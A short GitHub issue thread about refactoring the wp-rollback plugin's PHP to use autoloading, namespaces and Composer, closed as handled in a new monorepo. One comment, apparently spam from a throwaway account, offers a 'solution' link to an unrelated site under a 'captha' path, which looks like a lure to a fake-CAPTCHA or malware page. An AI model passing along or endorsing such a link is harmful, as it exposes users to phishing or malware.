### ISSUE TITLE
PHP should autoload

### ISSUE THREAD

**Issue by DevinWalker** [DevinWalker/wp-rollback#90]
### Description

This is a task to refactor the PHP so it is more modern and optimized using autoloading, namespaces, composer, etc.

### Context

This will help lay the groundwork for the Pro plugin.

**Comment by thegamerjedbest45454** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by DevinWalker** [comment]
This is being resolved in the new monorepo.
